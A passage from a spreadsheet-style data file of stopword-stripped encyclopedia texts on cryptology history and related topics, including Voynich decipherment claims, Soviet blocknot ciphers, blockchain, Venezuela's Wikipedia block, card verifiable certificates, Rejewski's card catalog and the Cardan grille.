(speaking-in-tongues), channelling, outsider art. author felt compelled write large amounts text manner resembles stream consciousness, either voices heard urge. this often takes place invented language glossolalia, usually made fragments author's language, although invented scripts purpose rare. kennedy churchill hildegard bingen's works point similarities voynich manuscript illustrations drew suffering severe bouts migraine, induce trance-like state prone glossolalia. prominent features found abundant "streams stars", repetitive nature "nymphs" balneological section.the theory controversial, virtually impossible prove disprove short deciphering text. kennedy churchill convinced hypothesis, consider plausible. culminating chapter work, kennedy states belief hoax forgery. churchill acknowledges possibility manuscript either synthetic forgotten language advanced friedman), else forgery, preeminent theory. however, concludes that, manuscript genuine creation, mental illness delusion seems affected author. decipherment claims since manuscript's modern rediscovery 1912, number claimed decipherings. william romaine newbold earliest efforts unlock book's secrets (and first many premature claims decipherment) made 1921 william romaine newbold university pennsylvania. singular hypothesis held visible text meaningless, apparent "letter" fact constructed series tiny markings discernible magnification. these markings supposed based ancient greek shorthand, forming second level script held real content writing. newbold claimed used knowledge work entire paragraphs proving authorship bacon recording compound microscope four hundred years leeuwenhoek. circular drawing astronomical section depicts irregularly shaped object four curved arms, newbold interpreted picture galaxy, could obtained telescope. however, newbold's analysis since dismissed overly speculative john matthews manly university chicago pointed serious flaws theory. each shorthand character assumed multiple interpretations, reliable determine intended given case. newbold's method also required rearranging letters intelligible latin produced. these factors alone ensure system enough flexibility nearly anything could discerned microscopic markings. although evidence micrography using hebrew language traced back ninth century, nowhere near compact complex shapes newbold made out. close study manuscript revealed markings artefacts caused cracks dries rough vellum. perceiving significance artefacts attributed pareidolia. thanks manly's thorough refutation, micrography theory generally disregarded. joseph martin feely 1943, joseph martin feely published roger bacon's cipher: right found, claimed book scientific diary written roger bacon. feely's method posited text highly abbreviated medieval latin written simple substitution cipher. leonell strong leonell strong, cancer research scientist amateur cryptographer, believed solution voynich manuscript "peculiar double system arithmetical progressions multiple alphabet". strong claimed </t>
  </si>
  <si>
    <t>Blocknots</t>
  </si>
  <si>
    <t>blocknots random sequences numbers contained book organized numbered rows columns used additives recyphering soviet union codes, world blocknot consisted fifty sheets 5-figure random additive, additive groups sheet. sheet used once, thus blocknots effect form one-time pad. soviet unions highest grade ciphers used east, 5-figure codebook enciphered blocknot book, generally considered unbreakable. technical description blocknots distributed centrally office moscow. every blocknot contained 5-figure groups number sheets, enciphering 5-figure messages. encipherment effected applying additives taken pad, 50-100 5-figure groups appeared. each 5-figure number sheet 2-figure number running consecutively. there different types blocknots, different categories individual table random numbers used once. general page blocknot valid day. security additive sequence rested choice different starting points message. 5-figure messages, blocknot first groups message. position changed long intervals, always easy re-identify. russians differentiated three types blocks:the 3-block, drierblock. i-block individual block: pages, additive read direction only. messages could used read wireless telegraphy stations net. 6-block, sechserblock. z-block circular block: pages, additive read either direction. messages could used read, stations net. 2-block, zweierblock. os-block. used traffic lower higher formations.two types used, lower echelons. notblock: used emergency. blocknot used passing traffic.the distribution blocknots carried centrally moscow army groups armies. army responsible distribution throughout lower levels army company level. independent units took cipher material them. occasionally blocknot distributed units different parts front, enabled depth established. records blocknots used kept berlin repeat noticed blocknot angebot message sent german signals units, indicate possible break code using there certainty this.a cryptanalyst general nachrichtenaufklärung stated interrogated ticom: seems depths established beginning russian campaign 5-figure code broken 1943german cryptanalysts prisoners stated interrogation, figures placed clair usually within first groups text sometimes end. indicator blocknot number consisted random figures, figure representing type, remaining two, page blocknot used.in long messages, 000000 placed message page reached. number chi-number serial numbering 5-figure messages passing hands cipher officer, starting first january ending thirty-first december current year. always appeared last group intercepted message, e.g. 00001 january, unit newly progression chi-numbers carefully observed recorded form graph. russian corps 5-figure messages day, army 20-30 front 60-100. after relatively short time, individual curves separated sharply type formation could recognized height chi-number alone. monitoring blocknots tracked card index, maintained signal intelligence evaluation centre (naas). naas functionality included evaluation traffic analysis, cryptanalysis, collation dissemination intelligence. card index, amongst several card indexes. careful recording study blocks provided positive clues identification tracking formations using 5-figure ciphers. index subdivided files: search card index, contained blocknots chi-numbers whether known. unit card index, contained known block chi-numbers.inspector berger, chief cryptanalyst naas stated files formed: important surest instruments identifying russian radio nets, known him.the blocknots also used stationary intercept company (feste), military unit designed work lower level naas, army level semi-motorized, closer front. feste used blocknot value along several parameters build network diagram. network diagram studied extensively, part 6-stage process, involved several departments within feste. final outcome metric dermined interesting circuit traffic monitoring, least interesting, monitoring traffic cease. analysis johannes marquart mathematician cryptanalyst initially worked inspectorate 7/vi later referat group general nachrichtenaufklärung. marquart assigned study soviet union blocknot traffic. marquart unit conducted extensive research attempt discover method produced. counts made, however, failed reveal non-random characteristics design tables, thought blocknots must generated machine, never able draw concrete deductions result research. example soviet guard tank army transmits 5-figure message blocknot 37581 (one first groups message). block 37582 used formation. next 37583 appeared. thereafter, period, army heard german wireless telegraphy intercept operators, maintaining wireless silence. after days, unidentified blocknot 37588 picked this message claimed, proximity blocks (88/83) guard tank army. missing blocknots 84-87 presumably used telegraphic, telephonic courier communications. number provides confirmation first assumption, based proximity blocknots cases. references</t>
  </si>
  <si>
    <t>Blockchain</t>
  </si>
  <si>
    <t>blockchain type digital ledger technology (dlt) consists growing list records, called blocks, securely linked together using cryptography. each block contains cryptographic hash previous block, timestamp, transaction data (generally represented merkle tree, data nodes represented leafs). timestamp proves transaction data existed block created. since block contains information block previous effectively form chain (compare linked list data structure), additional block linking ones consequently, blockchain transactions irreversible that, recorded, data given block cannot altered retroactively without altering subsequent blocks. blockchains typically managed peer-to-peer (p2p) computer network public distributed ledger, nodes collectively adhere consensus algorithm protocol validate transaction blocks. although blockchain records unalterable, since blockchain forks possible, blockchains considered secure design exemplify distributed computing system high byzantine fault tolerance.the blockchain created person group people) using name pseudonym) satoshi nakamoto 2008 serve public distributed ledger bitcoin cryptocurrency transactions, based previous work stuart haber, scott stornetta, dave bayer. identity satoshi nakamoto remains unknown date. implementation blockchain within bitcoin made first digital currency solve double-spending problem without need trusted authority central server. bitcoin design inspired applications blockchains readable public widely used cryptocurrencies. blockchain considered type payment rail.private blockchains proposed business use. computerworld called marketing privatized blockchains without proper security model "snake oil"; however, others argued permissioned blockchains, carefully designed, decentralized therefore secure practice permissionless ones. history cryptographer david chaum first proposed blockchain-like protocol 1982 dissertation "computer systems established, maintained, trusted mutually suspicious groups." further work cryptographically secured chain blocks described 1991 stuart haber scott stornetta. they wanted implement system wherein document timestamps could tampered with. 1992, haber, stornetta, dave bayer incorporated merkle trees design, improved efficiency allowing several document certificates collected block. under company surety, document certificate hashes published york times every week since 1995.the first decentralized blockchain conceptualized person group people) known satoshi nakamoto 2008. nakamoto improved design important using hashcash-like method timestamp blocks without requiring signed trusted party introducing difficulty parameter stabilize rate blocks added chain. design implemented following year nakamoto core component cryptocurrency bitcoin, serves public ledger transactions network.in august 2014, bitcoin blockchain file size, containing records transactions occurred network, reached (gigabytes). january 2015, size grown almost january 2016 january 2017, bitcoin blockchain grew size. ledger size exceeded early 2020.the words block chain used separately satoshi nakamoto's original paper, eventually popularized single word, blockchain, 2016.according accenture, application diffusion innovations theory suggests blockchains attained 13.5% adoption rate within financial services 2016, therefore reaching early adopters' phase. industry trade groups joined create global blockchain forum 2016, initiative chamber digital commerce. 2018, gartner found cios indicated kind blockchain adoption within organisations, cios short-term "planning [looking active experimentation blockchain". year 2019 gartner reported cios believed blockchain technology 'game-changer' business. structure design blockchain decentralized, distributed, often public, digital ledger consisting records called blocks used record transactions across many computers involved block cannot altered retroactively, without alteration subsequent blocks. this allows participants verify audit transactions independently relatively inexpensively. blockchain database managed autonomously using peer-to-peer network distributed timestamping server. they authenticated mass collaboration powered collective self-interests. such design facilitates robust workflow participants' uncertainty regarding data security marginal. blockchain removes characteristic infinite reproducibility digital asset. confirms unit value transferred once, solving long-standing problem double-spending. blockchain described value-exchange protocol. blockchain maintain title rights because, properly detail exchange agreement, provides record compels offer acceptance.logically, blockchain seen consisting several layers: infrastructure (hardware) networking (node discovery, information propagation verification) consensus (proof work, proof stake) data (blocks, transactions) application (smart contracts/decentralized applications, applicable) blocks blocks hold batches valid transactions hashed encoded merkle tree. each block includes cryptographic hash prior block blockchain, linking two. linked blocks form chain. this iterative process confirms integrity previous block, back initial block, known genesis block (block assure integrity block data contained block usually digitally signed.sometimes separate blocks produced concurrently, creating temporary fork. addition secure hash-based history, blockchain specified algorithm scoring different versions history higher score selected others. blocks selected inclusion chain called orphan blocks. peers supporting database different versions history time time. they keep highest-scoring version database known them. whenever peer receives higher-scoring version (usually version single block added) extend overwrite database retransmit improvement peers. there never absolute guarantee particular entry remain best version history forever. blockchains typically built score blocks onto blocks given incentives extend blocks rather overwrite blocks. therefore, probability entry becoming superseded decreases exponentially blocks built eventually becoming low.: example, bitcoin uses proof-of-work system, chain cumulative proof-of-work considered valid network. there number methods used demonstrate sufficient level computation. within blockchain computation carried redundantly rather traditional segregated parallel manner. block time block time average time takes network generate extra block blockchain. some blockchains create block frequently every five seconds. time block completion, included data becomes verifiable. cryptocurrency, practically transaction takes place, shorter block time means faster transactions. block time ethereum seconds, bitcoin average minutes. hard forks decentralization storing data across peer-to-peer network, blockchain eliminates number risks come data held centrally. decentralized blockchain message passing distributed networking. risk lack decentralization so-called "51% attack" central entity gain control half network manipulate specific blockchain record will, allowing double-spending.peer-to-peer blockchain networks lack centralized points vulnerability computer crackers exploit; likewise, central point failure. blockchain security methods include public-key cryptography.: public long, random-looking string numbers) address blockchain. value tokens sent across network recorded belonging address. private like password gives owner access digital assets means otherwise interact various capabilities blockchains support. data stored blockchain generally considered incorruptible.every node decentralized system copy blockchain. data quality maintained massive database replication computational trust. centralized "official" copy exists user "trusted" other. transactions broadcast network using software. messages delivered best-effort basis. early blockchains rely energy-intensive mining nodes validate transactions, block building, broadcast completed block nodes.: blockchains various time-stamping schemes, proof-of-work, serialize changes. later consensus methods include proof stake. growth decentralized blockchain accompanied risk centralization computer resources required process larger amounts data become expensive. openness open blockchains user-friendly traditional ownership records, which, open public, still require physical access view. because early blockchains permissionless, controversy arisen blockchain definition. issue ongoing debate whether private system verifiers tasked authorized (permissioned) central authority considered blockchain. proponents permissioned private chains argue term "blockchain" applied data structure batches data time-stamped blocks. these blockchains serve distributed version multiversion concurrency control (mvcc) databases. just mvcc prevents transactions concurrently modifying single object database, blockchains prevent transactions spending single output blockchain.: 30–31 opponents permissioned systems resemble traditional corporate databases, supporting decentralized data verification, systems hardened operator tampering revision. nikolai hampton computerworld said "many in-house blockchain solutions nothing cumbersome databases," "without clear security model, proprietary blockchains eyed suspicion." permissionless (public) blockchain advantage open, permissionless, public, blockchain network guarding actors required access control needed. this means applications added network without approval trust others, using blockchain transport layer.bitcoin cryptocurrencies currently secure blockchain requiring entries include proof work. prolong blockchain, bitcoin uses hashcash puzzles. while hashcash designed 1997 adam back, original idea first proposed cynthia dwork moni naor ponyatovski 1992 paper "pricing processing combatting junk mail". 2016, venture capital investment blockchain-related projects weakening increasing china. bitcoin many cryptocurrencies open (public) blockchains. april 2018, bitcoin highest market capitalization. permissioned (private) blockchain permissioned blockchains access control layer govern access network. contrast public blockchain networks, validators private blockchain networks vetted network owner. they rely anonymous nodes validate transactions benefit network effect. permissioned blockchains also name 'consortium' blockchains. argued permissioned blockchains guarantee certain level decentralization, carefully designed, opposed permissionless blockchains, often centralized practice. disadvantages permissioned blockchain nikolai hampton pointed computerworld "there also need percent' attack private blockchain, private blockchain (most likely) already controls percent block creation resources. could attack damage blockchain creation tools private corporate server, could effectively control percent network alter transactions however wished." this particularly profound adverse implications financial crisis debt crisis like financial crisis 2007–08, politically powerful actors make decisions favor groups expense others, "the bitcoin blockchain protected massive group mining effort. it's unlikely private blockchain protect records using gigawatts computing power time-consuming expensive." also said, "within private blockchain also 'race'; there's incentive power discover blocks faster competitors. this means many in-house blockchain solutions nothing cumbersome databases." blockchain analysis analysis public blockchains become increasingly important popularity bitcoin, ethereum, litecoin cryptocurrencies. blockchain, public, provides anyone wants access observe analyse chain data, given know-how. process understanding accessing flow crypto issue many cryptocurrencies, crypto exchanges banks. reason accusations blockchain-enabled cryptocurrencies enabling illicit dark market trade drugs, weapons, money laundering, etc. common belief cryptocurrency private untraceable, thus leading many actors illegal purposes. this changing specialised tech companies provide blockchain tracking services, making crypto exchanges, law-enforcement banks aware happening crypto funds fiat-crypto exchanges. development, argue, criminals prioritise cryptos monero. question public accessibility blockchain data personal privacy data. debate cryptocurrency ultimately blockchain. standardisation april 2016, standards australia submitted proposal international organization standardization consider developing standards support blockchain technology. this proposal resulted creation technical committee 307, blockchain distributed ledger technologies. technical committee working groups relating blockchain terminology, reference architecture, security privacy, identity, smart contracts, governance interoperability blockchain dlt, well standards specific industry sectors generic government requirements. more countries participating standardization process together external liaisons society worldwide interbank financial telecommunication (swift), european commission, international federation surveyors, international telecommunication union (itu) united nations economic commission europe (unece).many national standards bodies open standards bodies also working blockchain standards. these include national institute standards technology (nist), european committee electrotechnical standardization (cenelec), institute electrical electronics engineers (ieee), organization advancement structured information standards (oasis), individual participants internet engineering task force (ietf). centralized blockchain although blockchain implementation decentralized distributed, oracle launched centralized blockchain table feature oracle database. blockchain table oracle database centralized blockchain provide immutable feature. compared decentralized blockchains, centralized blockchains normally provide higher throughput lower latency transactions consensus-based distributed blockchains. types currently, least four types blockchain networks public blockchains, private blockchains, consortium blockchains hybrid blockchains. public blockchains public blockchain absolutely access restrictions. anyone internet connection send transactions well become validator (i.e., participate execution consensus protocol). usually, networks offer economic incentives secure utilize type proof stake proof work algorithm. some largest, known public blockchains bitcoin blockchain ethereum blockchain. private blockchains private blockchain permissioned. cannot join unless invited network administrators. participant validator access restricted. distinguish open blockchains peer-to-peer decentralized database applications open ad-hoc compute clusters, terminology distributed ledger (dlt) normally used private blockchains. hybrid blockchains hybrid blockchain combination centralized decentralized features. exact workings chain vary based portions centralization decentralization used. sidechains sidechain designation blockchain ledger runs parallel primary blockchain. entries primary blockchain (where said entries typically represent digital assets) linked sidechain; allows sidechain otherwise operate independently primary blockchain (e.g., using alternate means record keeping, alternate consensus algorithm, etc.). uses blockchain technology integrated multiple areas. primary blockchains distributed ledger cryptocurrencies bitcoin; also operational products matured proof concept late 2016. 2016, businesses testing technology conducting low-level implementation gauge blockchain's effects organizational efficiency back office.in 2019, estimated around $2.9 billion invested blockchain technology, represents increase year prior. additionally, international data corp estimated corporate investment blockchain technology reach $12.4 billion 2022. furthermore, according pricewaterhousecoopers (pwc), second-largest professional services network world, blockchain technology potential generate annual business value trillion 2030. pwc's estimate augmented 2018 study conducted, surveyed business executives determined least exposure utilizing blockchain technology, indicts significant demand interest blockchain technology.individual blockchain technology also greatly increased since 2016. according statistics 2020, million blockchain wallets 2020 comparison around million blockchain wallets 2016. cryptocurrencies most cryptocurrencies blockchain technology record transactions. example, bitcoin network ethereum network based blockchain. 2018 facebook confirmed would open blockchain group would headed david marcus, previously charge messenger. facebook's planned cryptocurrency platform, libra (now known diem), formally announced june 2019.the criminal enterprise silk road, operated tor, utilized cryptocurrency payments, federal government seized research blockchain forfeiture.governments mixed policies legality citizens banks owning cryptocurrencies. china implements blockchain technology several industries including national digital currency launched 2020. strengthen respective currencies, western governments including european union united states initiated similar projects. smart contracts blockchain-based smart contracts proposed contracts partially fully executed enforced without human interaction. main objectives smart contract automated escrow. feature smart contracts need trusted third party (such trustee) intermediary contracting entities blockchain network executes contract own. this reduce friction entities transferring value could subsequently open door higher level transaction automation. staff discussion 2018 reported smart contracts based blockchain technology might reduce moral hazards optimize contracts general. viable smart contract systems emerged." lack widespread legal status unclear. financial services according reason, many banks expressed interest implementing distributed ledgers banking cooperating companies creating private blockchains, according september 2016 study, occurring faster expected.banks interested technology least potential speed back office settlement systems. moreover, blockchain industry reached early maturity institutional appreciation grown practically speaking, infrastructure whole financial industry, implications entails.banks opening research labs dedicated blockchain technology order explore blockchain used financial services increase efficiency reduce costs.berenberg, german bank, believes blockchain "overhyped technology" large number "proofs concept", still major challenges, success stories.the blockchain also given rise initial coin offerings (icos) well category digital asset called security token offerings (stos), also sometimes referred digital security offerings (dsos). sto/dsos conducted privately public, regulated stock exchange used tokenize traditional assets company shares well innovative ones like intellectual property, real estate, art, individual products. number companies active space providing services compliant tokenization, private stos, public stos. games blockchain technology, cryptocurrencies non-fungible tokens (nfts), used video games monetization. many live-service games offer in-game customization options, character skins in-game items, players earn trade players using in-game currency. some games also allow trading virtual items using real-world currency, illegal countries video games seen akin gambling, gray market issues skin gambling, thus publishers typically shied away allowing players earn real-world funds games. blockchain games typically allow players trade in-game items cryptocurrency, exchanged money.the first known game blockchain technologies cryptokitties, launched november 2017, player would purchase nfts ethereum cryptocurrency, consisting virtual player could breed others create offspring combined traits nfts. game made headlines december 2017 virtual sold us$100,000. cryptokitties also illustrated scalability problems games ethereum created significant congestion ethereum network early 2018 approximately ethereum transactions game.by early 2020s, breakout success video games using blockchain, games tend focus using blockchain speculation instead traditional forms gameplay, offers limited appeal players. such games also represent high risk investors revenues difficult predict. however, limited successes games, axie infinity covid-19 pandemic, corporate plans towards metaverse content, refueled interest area gamefi, term describing intersection video games financing typically backed blockchain currency, second half 2021. several major publishers, including ubisoft, electronic arts, take interactive, stated blockchain nft-based games serious consideration companies future.in october 2021, valve corporation banned blockchain games, including using cryptocurrency nfts, hosted steam digital storefront service, widely used personal computer gaming, claiming extension policy banning games offered in-game items real-world value. valve's prior history gambling, specifically skin gambling, speculated factor decision blockchain games. journalists players responded positively valve's decision blockchain games reputation scams fraud among gamers, epic games, runs epic games store competition steam, said would open accepted blockchain games, wake valve's refusal. supply chain there several different efforts employ blockchains supply chain management. precious commodities mining blockchain technology used tracking origins gemstones precious commodities. 2016, wall street journal reported blockchain technology company everledger partnering ibm's blockchain-based tracking service trace origin diamonds ensure ethically mined. 2019, diamond trading company (dtc) involved building diamond trading supply chain product called tracr. food supply 2018, walmart running trial blockchain-backed system supply chain monitoring lettuce spinach nodes blockchain administered walmart located cloud. fashion industry there opaque relationship brands, distributors, customers fashion industry, prevent sustainable stable development fashion industry. blockchain makes shortcoming makes information transparent, solving difficulty sustainable development industry. domain names there several different efforts offer domain name services blockchain. these domain names controlled private key, purports allow uncensorable websites. this would also bypass registrar's ability suppress domains used fraud, abuse, illegal content.namecoin cryptocurrency supports ".bit" top-level domain (tld). namecoin forked bitcoin 2011. .bit sanctioned icann, instead requiring alternative root. 2015, used websites, 120,000 registered names. namecoin dropped opennic 2019, malware potential legal issues. other blockchain alternatives icann include handshake network, emerdns, unstoppable domains.specific tlds include ".eth", ".luxe", ".kred", associated ethereum blockchain ethereum name service (ens). .kred also acts alternative conventional cryptocurrency wallet addresses, convenience transferring cryptocurrency. other uses blockchain technology used create permanent, public, transparent ledger system compiling data sales, tracking digital payments content creators, wireless users musicians. gartner 2019 survey reported higher education respondents launched blockchain projects another planning academic projects next months. 2017, partnered ascap music adopt blockchain technology music distribution. imogen heap's mycelia service also proposed blockchain-based alternative "that gives artists control songs associated data circulate among fans musicians."new distribution methods available insurance industry peer-to-peer insurance, parametric insurance microinsurance following adoption blockchain. sharing economy also benefit blockchains involve many collaborating peers. blockchain libraries studied grant u.s. institute museum library services.other blockchain designs include hyperledger, collaborative effort linux foundation support blockchain-based distributed ledgers, projects initiative including hyperledger burrow monax) hyperledger fabric (spearheaded ibm). another quorum, permissionable private blockchain jpmorgan chase private storage, used contract applications.oracle introduced blockchain table feature oracle database.blockchain also used peer-to-peer energy trading.blockchain could used detecting counterfeits associating unique identifiers products, documents shipments, storing records associated transactions cannot forged altered. however argued blockchain technology needs supplemented technologies provide strong binding physical objects blockchain systems. euipo established anti-counterfeiting blockathon forum, objective "defining, piloting implementing" anti-counterfeiting infrastructure european level. dutch standardisation organisation uses blockchain together codes authenticate certificates.2022 beijing shanghai among cities designated china trial blockchain applications. blockchain interoperability with increasing number blockchain systems appearing, even support cryptocurrencies, blockchain interoperability becoming topic major importance. objective support transferring assets blockchain system another blockchain system. wegner stated "interoperability ability software components cooperate despite differences language, interface, execution platform". objective blockchain interoperability therefore support cooperation among blockchain systems, despite kinds differences. there already several blockchain interoperability solutions available. they classified three categories: cryptocurrency interoperability approaches, blockchain engines, blockchain connectors. several individual ietf participants produced draft blockchain interoperability architecture. energy consumption concerns some cryptocurrencies blockchain mining peer-to-peer computer computations transactions validated verified. this requires large amount energy. june 2018 bank international settlements criticized public proof-of-work blockchains high energy consumption.early concern high energy consumption factor later blockchains cardano (2017), solana (2020) polkadot (2020) adopting less energy-intensive proof-of-stake model. researchers estimated bitcoin consumes 100,000 times much energy proof-of-stake networks.in 2021, study cambridge university determined bitcoin terawatt-hours year) used electricity argentina 121twh) netherlands (109twh). according digiconomist, bitcoin transaction required kilowatt-hours electrical energy, amount average u.s. household consumed days.in february 2021, u.s. treasury secretary janet yellen called bitcoin extremely inefficient conduct transactions", saying "the amount energy consumed processing transactions staggering". march 2021, bill gates stated "bitcoin uses electricity transaction method known mankind", adding "it's great climate thing."nicholas weaver, international computer science institute university california, berkeley, examined blockchain's online security, energy efficiency proof-of-work public blockchains, cases found grossly inadequate. 31twh-45twh electricity used bitcoin 2018 produced 17-23 million tonnes co2. 2022, university cambridge digiconomist estimated largest proof-of-work blockchains, bitcoin ethereum, together used twice much electricity year whole sweden, leading release million tonnes year.some cryptocurrency developers considering moving proof-of-work model proof-of-stake model. academic research october 2014, bitcoin club, funding alumni, provided undergraduate students massachusetts institute technology access $100 bitcoin. adoption rates, studied catalini tucker (2016), revealed people typically adopt technologies early given delayed access, tend reject technology. many universities founded departments focusing crypto blockchain, including mit, 2017. year, edinburgh became "one first european universities launch blockchain course", according financial times. adoption decision motivations adopting blockchain technology aspect innovation adoptation) investigated researchers. example, janssen, provided framework analysis, koens poll pointed adoption could heavily driven non-technical factors. based behavioral models, discussed differences adoption individual level organizational levels. collaboration scholars business management started studying role blockchains support collaboration. argued blockchains foster cooperation (i.e., prevention opportunistic behavior) coordination (i.e., communication information sharing). thanks reliability, transparency, traceability records, information immutability, blockchains facilitate collaboration differs traditional contracts relational norms. contrary contracts, blockchains directly rely legal system enforce agreements. addition, contrary relational norms, blockchains require trust direct connections collaborators. blockchain internal audit need internal audits provide effective oversight organizational efficiency require change information accessed formats. blockchain adoption requires framework identify risk exposure associated transactions using blockchain. institute internal auditors identified need internal auditors address transformational technology. methods required develop audit plans identify threats risks. internal audit foundation study, blockchain internal audit, assesses factors. american institute certified public accountants outlined roles auditors result blockchain. journals september 2015, first peer-reviewed academic journal dedicated cryptocurrency blockchain technology research, ledger, announced. inaugural issue published december 2016. journal covers aspects mathematics, computer science, engineering, law, economics philosophy relate cryptocurrencies bitcoin.the journal encourages authors digitally sign file hash submitted papers, timestamped bitcoin blockchain. authors also asked include personal bitcoin address first page papers non-repudiation purposes. also changelog record notable changes made project checklist informational used reduce failure economics digitization privacy blockchain version control record changes (mostly software project) form graph references further reading external links media related blockchain wikimedia commons</t>
  </si>
  <si>
    <t>Block of Wikipedia in Venezuela</t>
  </si>
  <si>
    <t>january 2019, main telecommunications provider venezuela, cantv, issued block online encyclopedia, wikipedia. cantv's million users affected decision. block lifted january 2019, following widespread criticism state-owned company, claiming response venezuelan presidential crisis.the block coincided juan guaidó's claims become acting president beginning venezuelan presidential crisis. during crisis, several internet outages reported well blocking multiple websites, including wikipedia.wikimedia venezuela reported another block wikipedia january 2019. context wikipedia block occurred midst several edit wars spanish wikipedia articles nicolás maduro, juan guaidó, president venezuela list presidents venezuela. edit wars conflict edits registered users anonymous users, different opinions re-election maduro president venezuela 2019, assumption presidency guaidó, well chronology presidency. initial edits claimed guaidó declared president, following wars removing information. block afternoon january 2019, netblocks internet observatory collected technical evidence blocking versions wikipedia venezuela. restrictions implemented cantv, largest telecommunications provider country. netblocks identified major disruption network affecting telecommunications infrastructure, coincided restrictions affecting ability venezuelans access information previous hours. believed reason attempt hide suppress wikipedia article newly appointed president national assembly, juan guaidó, included "51st president bolivarian republic venezuela." information collected also shows several websites recently restricted, meaning political instability country main motive control internet.the observatory without filters (spanish: filtro) also collected information block, showing irregularly effective block, http filtering block according (server name indication), preventing connection server established high frequency. group reported thought block ended january 4:50pm, blocking methods showed later, deleted tweet incorrect information.similarly, several media outlets suggested wikipedia directly indirectly taking sides either group. reactions wikimedia foundation january, wikimedia foundation said opening investigation ongoing event, still receiving traffic edits venezuela time. wikimedia venezuela statement, wikimedia venezuela announced: during last hours, volunteers non-profit civil association wikipedia shown inability access free encyclopedia using prevalent internet service provider venezuela, state company cantv government january, nicolás maduro spoke wikipedia said opposition "aiming garner political power become president wikipedia republic, twitter republic", reference edit wars took place surrounding appointment juan guaidó president midst presidential crisis. maduro added "there wikipedia twitter".william castillo, former president national commission telecommunications (conatel) current deputy minister international communication denied block wikipedia, alleged attack site, discredit venezuelan government. also 2019 venezuelan presidential crisis block wikipedia turkey censorship venezuela censorship wikipedia notes references</t>
  </si>
  <si>
    <t>Card Verifiable Certificate</t>
  </si>
  <si>
    <t>card verifiable certificates (cvc) digital certificates designed processed devices limited computing power smart cards. this achieved using simple type–length–value (tlv) encoding fixed fields. fixed fields means field certificate fixed, maximum, length field comes well defined order. this makes parsing easy, contrast asn.1 parsing requires processing keep fields memory parsing nested content. used third generation epassports implementing extended access control (eac). there open source implementations processing eac/cvc certificates: ejbca jmrtd references</t>
  </si>
  <si>
    <t>Card catalog (cryptology)</t>
  </si>
  <si>
    <t>card catalog, "catalog characteristics," cryptography, system designed polish cipher bureau mathematician-cryptologist marian rejewski, first completed 1935 1936, facilitate decrypting german enigma ciphers. history polish cipher bureau used theory permutations start breaking enigma cipher late 1932. bureau recognized enigma machine's doubled-key (see grill (cryptology)) permutations formed cycles, cycles could used break cipher. with german cipher keys provided french spy, bureau able reverse engineer enigma start reading german messages. time, germans using steckers, polish grill method feasible. august 1936, germans started using steckers, change made grill method less feasible. bureau needed improved method break german cipher. although steckers would change letters doubled-key's cycle, steckers would change number cycles length cycles. steckers could ignored. ignoring mid-key turnovers, enigma machine distinct settings three rotors, three rotors could arranged machine 3!=6 ways. that meant 105456 likely doubled-key permutations. bureau determining cataloging characteristic likely permutations. each letter could partition number possible values, letters meant 1030301 possible keys. average, would find setting rotors, might find several possible settings. polish cryptanalyst could collect enough traffic determine cycles daily key. that usually took messages. result might (pjxroquctwzsy)(kvgledmanhfib) (kxtcoigweh)(zvfbsylrnp)(ujd)(mqa) (yvxqtdhpim)(skgrjbcolw)(un)(fa)(e)(z) {\displaystyle {\begin{aligned}ad&amp;={\texttt {(pjxroquctwzsy)(kvgledmanhfib)}}\\be&amp;={\texttt {(kxtcoigweh)(zvfbsylrnp)(ujd)(mqa)}}\\cf&amp;={\texttt {(yvxqtdhpim)(skgrjbcolw)(un)(fa)(e)(z)}}\\\end{aligned}}} would lengths cycles (132;102-32;102-22-12) look wheel order iii) starting rotor positions card catalog. would enigma compute un-steckered cycles: (sjxroqtcuzwpy)(kngledamvhifb) (kxucofgzeh)(wnibpylrvs)(tjd)(aqm) (ynxqudhsfa)(pkgrjbcolz)(tv)(im)(e)(w) {\displaystyle {\begin{aligned}ad&amp;={\texttt {(sjxroqtcuzwpy)(kngledamvhifb)}}\\be&amp;={\texttt {(kxucofgzeh)(wnibpylrvs)(tjd)(aqm)}}\\cf&amp;={\texttt {(ynxqudhsfa)(pkgrjbcolz)(tv)(im)(e)(w)}}\\\end{aligned}}} comparing steckered cycles german traffic un-steckered cycles, cryptanalyst determine steckers. example, permutation (e)(z) (e)(w). that requires unsteckered stecker. cycles aligned determine steckered un-steckered letters. (pjxroquctwzsy)(kvgledmanhfib)/(kxtcoigweh)... (sjxroqtcuzwpy)(kngledamvhifb)/(kxucofgzeh)... (!_____!_!**!_)(_!__=_!!!_!!_)/(__!__!_*=_)...where known un-steckered letter, known steckered letter, newly discovered stecker. repetition produces steckers a-m, f-i, n-v, p-s, t-u, w-z. preparation card catalog, using cyclometer rejewski invented 1934 1935, laborious task took year's time. catalog complete, obtaining enigma daily keys matter fifteen minutes.when germans changed enigma machine's "reflector," "reversing drum," november 1937, cipher bureau forced start card catalog: task," writes rejewski, "which consumed, account greater experience, probably somewhat less year's time."on september 1938 germans completely changed procedure enciphering message keys, rendering card-catalog method useless. this spurred invention rejewski's cryptologic bomb henryk zygalski's "perforated sheets." notes references władysław kozaczuk, enigma: german machine cipher broken, read allies world two, edited translated christopher kasparek, frederick, university publications america, 1984, isbn 0-89093-547-5. marian rejewski, "summary methods reconstructing enigma reconstructing daily keys, german efforts frustrate those methods," appendix władysław kozaczuk, enigma, 1984, 241–45. marian rejewski, "how polish mathematicians broke enigma," appendix władysław kozaczuk, enigma, 1984, 246–71. marian rejewski, "the mathematical solution enigma cipher," appendix władysław kozaczuk, enigma, 1984, 272–91.</t>
  </si>
  <si>
    <t>Cardan grille</t>
  </si>
  <si>
    <t>cardan grille method writing secret messages using grid. history this technique used ancient china.in 1550, girolamo cardano (1501–1576), known french jérôme cardan, proposed simple grid writing hidden messages. intended cloak messages inside ordinary letter whole would appear cipher all. such disguised message considered example steganography, sub-branch general cryptography. name cardan applied grilles cardan's invention, and, cardan generic name cardboard grille ciphers. cardinal richelieu (1585–1642) reputed fond cardan grille used private diplomatic correspondence. educated 17th century europe familiar word games literature, including acrostics, anagrams, ciphers. although original cardan grilles little used 17th century, still appeared occasionally form masked letters literary curiosities. george gordon byron, example, claimed written cardan-grille verse demonstration verbal skill rather serious cipher.alternative grilles possess apertures single letters used quickly. messages filled jumble letters numbers clearly cryptograms whereas cardano intended create steganograms. these single-letter grilles named cardano, also called simply cardboard ciphers. variation turning grille trellis, based chess board, used latter 16th century. turning grille reappeared sophisticated form 19th century; but, time, connection cardano name alone. construction cardan grille made sheet fairly rigid paper parchment, thin metal. paper ruled represent lines handwriting rectangular areas arbitrary intervals lines. encipherer places grille sheet paper writes message rectangular apertures, might allow single letter, syllable, whole word. then, 